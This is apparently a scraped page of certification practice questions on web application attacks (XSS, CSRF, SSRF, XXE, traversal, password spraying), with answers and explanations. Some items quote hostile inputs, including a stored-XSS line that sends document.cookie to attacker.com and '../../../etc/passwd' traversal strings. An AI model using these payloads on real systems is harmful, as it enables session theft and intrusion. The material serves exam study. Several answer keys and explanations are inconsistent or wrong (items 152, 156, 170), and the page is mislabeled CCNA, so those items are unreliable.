HTTP/1.1…","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-analyst-reviews-a-web-server-log-and-sees-the-following-r-vknfi"},{"@type":"ListItem","position":165,"name":"An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP…","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-attacker-attempts-to-exploit-a-web-application-by-sending-ta4mf"},{"@type":"ListItem","position":166,"name":"Which of the following tools is specifically designed to automate the process of detecting and exploiting SQL injection …","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-of-the-following-tools-is-specifically-designed-to-aut-xkfap"},{"@type":"ListItem","position":167,"name":"During a penetration test, you identify a parameter in a web application that appears to fetch a file from the server. Y…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-penetration-test-you-identify-a-parameter-in-a-web-g8aef"},{"@type":"ListItem","position":168,"name":"Which THREE of the following are valid defenses against CSRF attacks? (Select 3)","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-three-of-the-following-are-valid-defenses-against-csrf-yqomn"},{"@type":"ListItem","position":169,"name":"Which THREE of the following are effective mitigation techniques against Cross-Site Scripting (XSS) attacks?","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-three-of-the-following-are-effective-mitigation-techni-z1amt"},{"@type":"ListItem","position":170,"name":"A penetration tester discovers that a web application's login page does not enforce rate limiting and several usernames …","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-penetration-tester-discovers-that-a-web-application-s-logi-m4drw"},{"@type":"ListItem","position":171,"name":"A security analyst notices that the web application returns different response times when querying user IDs. For example…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-analyst-notices-that-the-web-application-returns-ykf1w"},{"@type":"ListItem","position":172,"name":"During a security assessment, a tester discovers an endpoint that reflects the 'User-Agent' header in the response witho…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-security-assessment-a-tester-discovers-an-endpoint-r4lzn"}]}

CCNA Web Application and Injection Attacks Questions

22 of 172 questions · Page 3/3 · Web Application and Injection Attacks · Answers revealed

151
Multi-Selecteasy

A web application is vulnerable to XML External Entity (XXE) injection. Which THREE of the following are potential impacts of successfully exploiting an XXE vulnerability?

Select 3 answers
A.SQL injection
B.Arbitrary file read on the server
C.Denial of Service (DoS)
D.Server-Side Request Forgery (SSRF)
E.Remote code execution via command injection
AnswersB, C, D

XXE allows reading files via external entities.

Why this answer

XXE can be used for reading local files (e.g., /etc/passwd), performing SSRF by making the server issue requests, and causing denial of service (e.g., billion laughs attack).

152
MCQeasy

Which of the following is the BEST defense against brute-force attacks on a login form?

A.Rate limiting on the login endpoint
B.CAPTCHA
C.Complex password policy
D.Account lockout after 5 failed attempts
AnswerA, B, D

Rate limiting reduces the speed of brute-force attempts, but account lockout is a more specific defense.

Why this answer

Rate limiting on the login endpoint is the best defense because it directly restricts the number of requests an attacker can send over a given time window, making brute-force attacks impractical. Unlike reactive measures like account lockout, rate limiting proactively throttles traffic at the network or application layer, preventing the attacker from even attempting many guesses. This approach is effective against distributed brute-force attacks where lockout policies can be bypassed by rotating IP addresses.

Exam trap

EC-Council often tests the misconception that account lockout is the strongest defense, but the trap here is that lockout can be circumvented by distributed attacks or cause denial of service, whereas rate limiting is a proactive, scalable control that works at the protocol level.

How to eliminate wrong answers

Option B (CAPTCHA) is wrong because while it can slow down automated attacks, it is not the best defense as it can be bypassed using OCR, machine learning, or third-party solving services, and it degrades user experience. Option C (Complex password policy) is wrong because it only increases the password search space but does not prevent brute-force attempts; attackers can still try millions of combinations over time. Option D (Account lockout after 5 failed attempts) is wrong because it is a reactive measure that can be exploited for denial-of-service attacks against legitimate users, and attackers can bypass it by using many different usernames or IP addresses in a distributed brute-force attack.

153
Multi-Selecthard

A security analyst is reviewing a web application log and sees the following request: GET /page?file=../../../etc/passwd HTTP/1.1. Which TWO vulnerabilities are most likely being attempted? (Select two)

Select 2 answers
A.Directory traversal
B.Remote file inclusion (RFI)
C.SQL injection
D.Local file inclusion (LFI)
E.Command injection
AnswersA, D

The '../' pattern indicates an attempt to access files outside the web root.

Why this answer

The request uses '../' to traverse directories (directory traversal) and attempts to read the /etc/passwd file, which is also a local file inclusion (LFI) attempt if the application includes files.

154
MCQmedium

A penetration tester is assessing a web application and notices that the application reflects the User-Agent header in the response body without sanitization. What attack could be performed using this behavior?

A.Cross-Site Scripting (XSS)
B.Directory traversal
C.Server-Side Request Forgery (SSRF)
D.SQL injection
AnswerA

Reflecting user input (User-Agent) without sanitization allows XSS.

Why this answer

Reflecting unsanitized input in HTTP headers can lead to reflected XSS.

155
MCQmedium

An attacker performs a password spraying attack against a web application. Which of the following BEST describes this technique?

A.Using a list of compromised credentials from a data breach
B.Trying many passwords for a single account
C.Trying a few common passwords against many accounts
D.Using automated tools to bypass CAPTCHA
AnswerC

Password spraying targets many accounts with a small set of common passwords to avoid lockouts.

Why this answer

Password spraying uses a few common passwords against many accounts to avoid account lockout.

156
Multi-Selecthard

A web application uses cookies for session management. The application is vulnerable to CSRF. Which THREE of the following are effective mitigation techniques? (Choose THREE.)

Select 3 answers
A.Implementing Multi-Factor Authentication (MFA)
B.Using HTTP GET requests for state-changing operations
C.Setting SameSite cookies to Lax or Strict
D.Including a unique CSRF token in each request
E.Validating the Origin or Referer header
AnswersC, D, E

SameSite attribute prevents cookies from being sent in cross-site requests.

Why this answer

SameSite cookies restrict cross-origin requests. CSRF tokens provide a unique per-request secret. Custom headers (e.g., X-Requested-With) can be checked by the server.

Double Submit Cookies can also be used but is less common. MFA does not prevent CSRF.

157
MCQeasy

Which of the following tools is primarily used for automated SQL injection exploitation and database fingerprinting?

A.SQLMap
B.Nmap
C.Burp Suite
D.John the Ripper
AnswerA

SQLMap is designed for automated SQL injection.

Why this answer

SQLMap is the industry-standard tool for automating SQL injection detection and exploitation.

158
MCQmedium

In Burp Suite, which tool is used to modify and resend individual HTTP requests to observe responses, allowing manual testing of input validation and parameter manipulation?

A.Repeater
B.Proxy
C.Scanner
D.Intruder
AnswerA

Repeater allows sending and resending individual requests with manual modifications.

Why this answer

Burp Repeater is designed for manually crafting and resending requests to see individual responses, ideal for testing parameter handling.

159
Multi-Selecthard

During a penetration test, a tester observes that a web application's login form does not implement rate limiting and returns different error messages for valid vs invalid usernames. Which THREE attacks are most likely to be successful? (Select three)

Select 3 answers
A.Directory traversal
B.Credential stuffing
C.Brute-force attack
D.SQL injection
E.Password spraying
AnswersB, C, E

Valid usernames can be used with breached password lists.

Why this answer

With username enumeration and no rate limiting, brute force (trying many passwords on one user), credential stuffing (using breached credentials), and password spraying (trying common passwords across many users) are all viable. SQL injection is not directly related to the described conditions.

160
MCQhard

After a security incident, logs show repeated login attempts from different IP addresses using a list of common passwords against a single username. Which attack technique is being used?

A.Credential stuffing
B.Brute force attack
C.Password spraying
D.Dictionary attack
AnswerC

Password spraying uses a few common passwords against many accounts or single account from many IPs.

Why this answer

Password spraying uses a small set of common passwords against many accounts or, as in this case, against a single account from multiple IPs to avoid lockout.

161
MCQmedium

A security analyst notices that after submitting a form on a web application, the URL changes to include the user's ID parameter, e.g., 'user?id=123'. The analyst modifies the ID in the URL and accesses another user's profile without authorization. Which type of vulnerability is being exploited?

A.Reflected Cross-Site Scripting (XSS)
B.Command Injection
C.Cross-Site Request Forgery (CSRF)
D.Insecure Direct Object Reference (IDOR)
AnswerD

IDOR occurs when an application exposes references (e.g., user ID) and fails to verify authorization, allowing attackers to access other objects.

Why this answer

This is an Insecure Direct Object Reference (IDOR) vulnerability, where the application exposes internal object references (like user IDs) without proper access control checks.

162
MCQmedium

A security analyst observes that a web application allows users to submit feedback, and after submission, the feedback is displayed on a public page. An attacker submits feedback containing the script: <script>document.location='http://attacker.com/?c='+document.cookie</script>. When an admin views the public page, the script executes. Which type of attack occurred?

A.Reflected XSS
B.Cross-site request forgery (CSRF)
C.DOM-based XSS
D.Stored XSS
AnswerD

The malicious script is stored in the feedback database and executed when the admin retrieves it.

Why this answer

The script is stored on the server (feedback) and executed when the admin views the page. This is persistent (stored) XSS.

163
Multi-Selectmedium

Which TWO of the following are characteristics of a reflected Cross-Site Scripting (XSS) attack? (Select 2)

Select 2 answers
A.The attack is typically delivered through a crafted link
B.The script executes in the server-side context
C.The attack affects all users who visit the compromised page without any interaction
D.The malicious script is reflected off the web server in the response
E.The malicious script is permanently stored on the server
AnswersA, D

Reflected XSS often requires the victim to click a malicious link.

Why this answer

Reflected XSS requires user interaction (clicking a link) and does not persist on the server.

164
MCQhard

An analyst reviews a web server log and sees the following request: GET /search?q=<script>alert('xss')</script> HTTP/1.1. The response from the server includes the search term inside a <div> tag without any sanitization. Which type of XSS vulnerability does this indicate?

A.Stored XSS
B.Reflected XSS
C.DOM-based XSS
D.Blind XSS
AnswerB

The script is injected via a URL parameter and immediately reflected in the server's response, which is the definition of reflected XSS.

Why this answer

This is a typical reflected XSS because the malicious script is injected via a GET parameter and immediately reflected in the response without persistent storage.

165
MCQeasy

An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP request to a sensitive internal service. Which type of attack is this?

A.CSRF
B.XXE
C.SSRF
D.IDOR
AnswerC

SSRF involves the server making unintended requests to internal or external systems.

Why this answer

SSRF (Server-Side Request Forgery) occurs when an attacker can induce the server to make requests to internal resources.

166
MCQeasy

Which of the following tools is specifically designed to automate the process of detecting and exploiting SQL injection vulnerabilities in web applications?

A.Burp Suite
B.Metasploit
C.SQLMap
D.Nmap
AnswerC

SQLMap is the standard tool for automated SQL injection detection and exploitation.

Why this answer

SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws. It supports a wide range of database backends and injection techniques, making it the go-to tool for this specific task.

Exam trap

EC-Council often tests the distinction between general-purpose security tools (like Burp Suite or Metasploit) and specialized automation tools (like SQLMap), leading candidates to choose a tool they recognize for web testing rather than the one specifically designed for SQL injection automation.

How to eliminate wrong answers

Option A is wrong because Burp Suite is an intercepting proxy and web application security testing platform that requires manual configuration or extensions to automate SQL injection exploitation; it is not purpose-built for automated SQL injection detection and exploitation. Option B is wrong because Metasploit is a framework for developing and executing exploit code against remote targets, but it does not natively automate the detection and exploitation of SQL injection vulnerabilities in web applications without additional modules or manual scripting. Option D is wrong because Nmap is a network scanning tool used for host discovery, port scanning, and service enumeration, and it lacks any capability to detect or exploit SQL injection vulnerabilities.

167
MCQmedium

During a penetration test, you identify a parameter in a web application that appears to fetch a file from the server. You modify the parameter to '../../../etc/passwd' and see the contents of the passwd file. Which type of vulnerability is this?

A.Remote File Inclusion (RFI)
B.Directory traversal
C.Server-Side Request Forgery (SSRF)
D.Local File Inclusion (LFI)
AnswerB

The attacker is traversing directories to read arbitrary files, which is directory traversal.

Why this answer

The use of '../' sequences to traverse directories and access files outside the web root is classic directory traversal.

168
Multi-Selecthard

Which THREE of the following are valid defenses against CSRF attacks? (Select 3)

Select 3 answers
A.Custom request headers (e.g., X-Requested-With)
B.SameSite cookies set to Lax or Strict
C.CSRF tokens
D.Input validation
E.Output encoding
AnswersA, B, C

Custom headers can be used to verify origin, as cross-site requests cannot add custom headers in simple requests.

Why this answer

CSRF tokens, SameSite cookies (Lax or Strict), and custom headers (e.g., X-Requested-With with XMLHttpRequest) are all effective CSRF defenses.

169
Multi-Selecthard

Which THREE of the following are effective mitigation techniques against Cross-Site Scripting (XSS) attacks?

Select 3 answers
A.Output encoding
B.Implementing Content Security Policy (CSP)
C.Disabling JavaScript in the client browser
D.Using HTTPS for all communications
E.Input validation
AnswersA, B, E

Encoding output ensures that user input is treated as data, not executable code.

Why this answer

Input validation ensures malicious characters are rejected. Output encoding converts special characters to safe HTML entities. Content Security Policy (CSP) restricts script sources.

Disabling JavaScript is not practical. Using HTTPS protects data in transit but not against XSS.

170
MCQmedium

A penetration tester discovers that a web application's login page does not enforce rate limiting and several usernames are known from a prior data breach. The tester wants to try a few common passwords across many accounts to avoid account lockouts. Which attack technique is being used?

A.Password spraying
B.Credential stuffing
C.Brute force attack
D.Dictionary attack
AnswerA

Password spraying uses a few passwords across many accounts to avoid lockouts.

Why this answer

Password spraying involves trying a small number of common passwords against many user accounts to avoid account lockout. This contrasts with credential stuffing (using many passwords per account) and brute force (many passwords per user).

171
MCQmedium

A security analyst notices that the web application returns different response times when querying user IDs. For example, a valid user ID returns the page in 2 seconds, while an invalid ID returns in 0.5 seconds. The analyst suspects a blind SQL injection vulnerability. Which SQL injection technique is MOST likely being used?

A.Error-based SQL injection
B.Union-based SQL injection
C.Time-based blind SQL injection
D.Out-of-band SQL injection
AnswerC

Time-based uses conditional delays to infer Boolean results; response time differences are the key indicator.

Why this answer

Time-based blind SQL injection relies on causing a time delay (e.g., via SLEEP or WAITFOR DELAY) to infer the truth of conditions. The varying response times (2s vs 0.5s) indicate a time-based attack.

172
MCQhard

During a security assessment, a tester discovers an endpoint that reflects the 'User-Agent' header in the response without sanitization. The tester wants to confirm a reflected XSS vulnerability. Which of the following payloads would be MOST effective to demonstrate the issue in a single request?

A.Set the User-Agent to: <img src=x onerror=alert(1)>
B.Set the User-Agent to: ' OR '1'='1
C.Set the User-Agent to: <script>alert('XSS')</script>
D.Set the User-Agent to: ../../../../etc/passwd
AnswerC

This payload will execute JavaScript if the User-Agent is reflected unsanitized, proving the vulnerability.

Why this answer

Using a simple script alert like <script>alert(1)</script> is a standard proof-of-concept for reflected XSS. The exact payload may vary, but it must execute JavaScript. The simplest is an alert.

← PreviousPage 3 of 3 · 172 questions total

Ready to test yourself?

Try a timed practice session using only Web Application and Injection Attacks questions.